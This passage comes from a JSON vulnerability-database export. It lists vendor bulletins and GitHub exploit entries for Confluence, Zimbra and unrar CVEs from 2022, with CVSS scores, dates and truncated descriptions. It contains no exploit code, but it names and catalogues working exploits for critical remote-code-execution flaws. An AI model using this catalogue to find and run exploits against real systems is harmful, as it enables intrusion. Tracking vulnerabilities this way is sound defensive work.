7.18.1.\r\n\u00a0\r\nFor more information, see https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T20:08:07", "type": "atlassian", "title": "Remote code execution via OGNL injection in Confluence Server & Data Center - CVE-2022-26134", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-11-17T16:29:26", "id": "CONFSERVER-79016", "href": "https://jira.atlassian.com/browse/CONFSERVER-79016", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T15:36:52", "description": "This is a duplicate of https://jira.atlassian.com/browse/CONFSERVER-79016\r\n\r\nSee the link above for more information on the issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T03:36:35", "type": "atlassian", "title": "Unauthenticated remote code execution vulnerability via OGNL template injection - Duplicate", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-04-14T05:09:59", "id": "CONFSERVER-79000", "href": "https://jira.atlassian.com/browse/CONFSERVER-79000", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2023-06-06T15:27:21", "description": "# CVE-2022-26138\n\n# 1.\u7b80\u4ecb\nConfluence Hardcoded Password POC\n\n#...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-30T07:14:52", "type": "githubexploit", "title": "Exploit for Use of Hard-coded Credentials in Atlassian Questions For Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138"], "modified": "2023-04-27T05:22:39", "id": "120220D8-2281-57EE-BD84-1A33B8841E56", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:27:28", "description": "# Confluence-Question-CVE-2022-26138\nAtlassian Confluence Server...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-28T09:48:21", "type": "githubexploit", "title": "Exploit for Use of Hard-coded Credentials in Atlassian Questions For Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138"], "modified": "2022-09-21T21:50:55", "id": "E443E98A-3304-54B8-97FD-0FEF9DA283B3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-03T15:00:11", "description": "# CVE-2022-37042\n<img width=\"918\" alt=\"image\" src=\"https://user-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-25T10:43:13", "type": "githubexploit", "title": "Exploit for Improper Authentication in Zimbra Collaboration", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-37042"], "modified": "2022-12-20T10:09:26", "id": "FCDAD5A1-9FBC-5C1B-9851-198B7C227459", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-03T15:00:48", "description": "# Zimbra-CVE-2022-30333\nZimbra unrar vulnerability. Now there ar...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-26T13:28:12", "type": "githubexploit", "title": "Exploit for Path Traversal in Rarlab Unrar", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2023-03-30T22:10:11", "id": "4E2B73A6-1A0A-5AE6-A7D0-44663A8164FC", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "privateArea": 1}, {"lastseen": "2023-06-03T15:01:36", "description": "# CVE-2022-30333-POC \r\n**Sample file to test CVE-2022-30333**\r\n-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-05T02:35:12", "type": "githubexploit", "title": "Exploit for Path Traversal in Rarlab Unrar", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-11-19T19:17:38", "id": "A573E62D-1BE0-5CD3-8E6D-EB184127464A", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "privateArea": 1}, {"lastseen": "2023-06-03T15:01:01", "description": "A proof of concept for CVE-2022-30333 - a path traversal vulnera...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-15T22:29:42", "type": "githubexploit", "title": "Exploit for Path Traversal in Rarlab Unrar", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2023-01-31T12:38:36", "id": "098B066E-24CE-5910-B91F-4A11E2A94063", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "privateArea": 1}, {"lastseen": "2023-06-03T15:00:55", "description": "A proof of concept for CVE-2022-30333 - a path traversal vulnera...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-22T01:14:29", "type": "githubexploit", "title": "Exploit for Path Traversal in Rarlab Unrar", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-10-26T01:11:38", "id": "2AB84274-77B4-5551-8047-C6DEE2425EFF", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "privateArea": 1}, {"lastseen": "2023-06-03T15:00:08", "description": "Zimbra Unauthenticated Remote Code Execution Exploit (CVE-2022-2...", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-26T20:19:48", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Zimbra Collaboration", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925"], "modified": "2022-11-09T20:27:55", "id": "BD803D95-E2C1-554D-A0CD-6A594151E77B", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-22T16:04:09", "description": "Zimbra Unauthenticated Remote Code E...", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-14T22:22:55", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Zimbra Collaboration", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925"], "modified": "2022-08-22T14:34:49", "id": "11DEDDB4-6148-5800-86D0-BF20A0453109", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-10-01T23:04:55", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-25T15:09:49", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Zimbra Collaboration", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925"], "modified": "2022-09-26T01:46:08", "id": "6BB3EE38-B4B6-590A-85A9-5EE59E4A9316", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-03T14:58:31", "description": "# CVE-2022-27925 (Zimbra RCE 2022)\n\nThis repo is part of the ***...", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-01T10:33:55", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Zimbra Collaboration", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925"], "modified": "2023-05-19T03:10:08", "id": "549DF2E5-96E4-5204-9F2F-303AABC189EE", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-03T14:59:13", "description": "Zimbra Unauthenticated Remote Code Execution Exploit (CVE-2022-2...", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-17T22:24:32", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Zimbra Collaboration", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925"], "modified": "2022-10-07T03:31:22", "id": "A6071ED1-4DD2-5D98-9131-FEFBE84B4664", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:34:06", "description": "# Confluence RCE [CVE-2022-26134] Exploit Detection\n\n## Pre-requ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T13:52:14", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T09:11:48", "id": "26F41B84-2AAF-5C6C-BE06-461FF65C6D03", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:33:13", "description": "# CVE-2022-26134\n \n -u URL, --url URL \u76ee\u6807url\n \n -c COMM...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T02:11:58", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-01-31T13:06:36", "id": "796BB1A4-EF64-57CA-862E-996A72F2FBE5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:31:39", "description": "### CVE-2022-26134 - OGNL injection vulnerability.\n\nIn affected ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-21T11:49:48", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-03-30T14:37:47", "id": "1F9C946C-1533-5835-B5E8-641EF4FFC145", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:31:41", "description": "<h1 align=\"center\">\u300c\ud83d\udca5\u300dCVE-2022-26134</h1>\n\n<p align=\"center\"><im...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-19T13:50:22", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-03-15T14:04:01", "id": "5255E938-0B92-5E2C-B1A4-21B2445C29AF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:34:00", "description": "# CVE-2022-26134\r\nCVE-2022-26134 - Confluence Pre-Auth RCE | OGN...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T19:24:30", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-05-31T01:23:01", "id": "28E888C4-78E3-5F8D-B316-AB42FED892F9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:34:00", "description": "# Through the Wire\n\nThrough the Wire is a proof of concept explo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T13:59:19", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": 